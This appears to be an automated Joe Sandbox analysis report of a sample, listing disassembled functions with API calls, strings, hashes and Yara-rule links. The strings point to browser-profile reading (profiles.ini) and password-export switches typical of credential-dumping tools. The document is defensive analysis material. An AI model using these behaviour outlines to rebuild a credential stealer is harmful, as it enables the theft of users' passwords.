                                                                                                                                                Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00404172
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                • memset.MSVCRT ref: 00404200
                                                                                                                                                • memset.MSVCRT ref: 00404215
                                                                                                                                                • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                • memset.MSVCRT ref: 0040426E
                                                                                                                                                • memset.MSVCRT ref: 004042CD
                                                                                                                                                • memset.MSVCRT ref: 004042E2
                                                                                                                                                • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                • API String ID: 2454223109-1580313836
                                                                                                                                                • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                                • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                • API String ID: 4054529287-3175352466
                                                                                                                                                • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                                • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                • API String ID: 667068680-2887671607
                                                                                                                                                • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                • API String ID: 2000436516-3842416460
                                                                                                                                                • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                  • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                  • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                  • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1043902810-0
                                                                                                                                                • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                • memset.MSVCRT ref: 004085CF
                                                                                                                                                • memset.MSVCRT ref: 004085F1
                                                                                                                                                • memset.MSVCRT ref: 00408606
                                                                                                                                                • strcmp.MSVCRT ref: 00408645
                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                                                • memset.MSVCRT ref: 0040870E
                                                                                                                                                • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                                                • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                • String ID: ---
                                                                                                                                                • API String ID: 3437578500-2854292027
                                                                                                                                                • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                • malloc.MSVCRT ref: 004186B7
                                                                                                                                                • free.MSVCRT ref: 004186C7
                                                                                                                                                • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                • free.MSVCRT ref: 004186E0
                                                                                                                                                • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                • malloc.MSVCRT ref: 004186FE
                                                                                                                                                • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                • free.MSVCRT ref: 00418716
                                                                                                                                                • free.MSVCRT ref: 0041872A
                                                                                                                                                • free.MSVCRT ref: 00418749
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                • String ID: |A
                                                                                                                                                • API String ID: 3356672799-1717621600
                                                                                                                                                • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                                                                • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                                                                • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmp
                                                                                                                                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                • API String ID: 2081463915-1959339147
                                                                                                                                                • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1700100422-0
                                                                                                                                                • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 552707033-0
                                                                                                                                                • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                  • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                                • strchr.MSVCRT ref: 0040C140
                                                                                                                                                • strchr.MSVCRT ref: 0040C151
                                                                                                                                                • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                • memset.MSVCRT ref: 0040C17A
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                • String ID: 4$h
                                                                                                                                                • API String ID: 4066021378-1856150674
                                                                                                                                                • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_snwprintf
                                                                                                                                                • String ID: %%0.%df
                                                                                                                                                • API String ID: 3473751417-763548558
                                                                                                                                                • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                • GetParent.USER32(?), ref: 00406136
                                                                                                                                                • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                • String ID: A
                                                                                                                                                • API String ID: 2892645895-3554254475
                                                                                                                                                • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
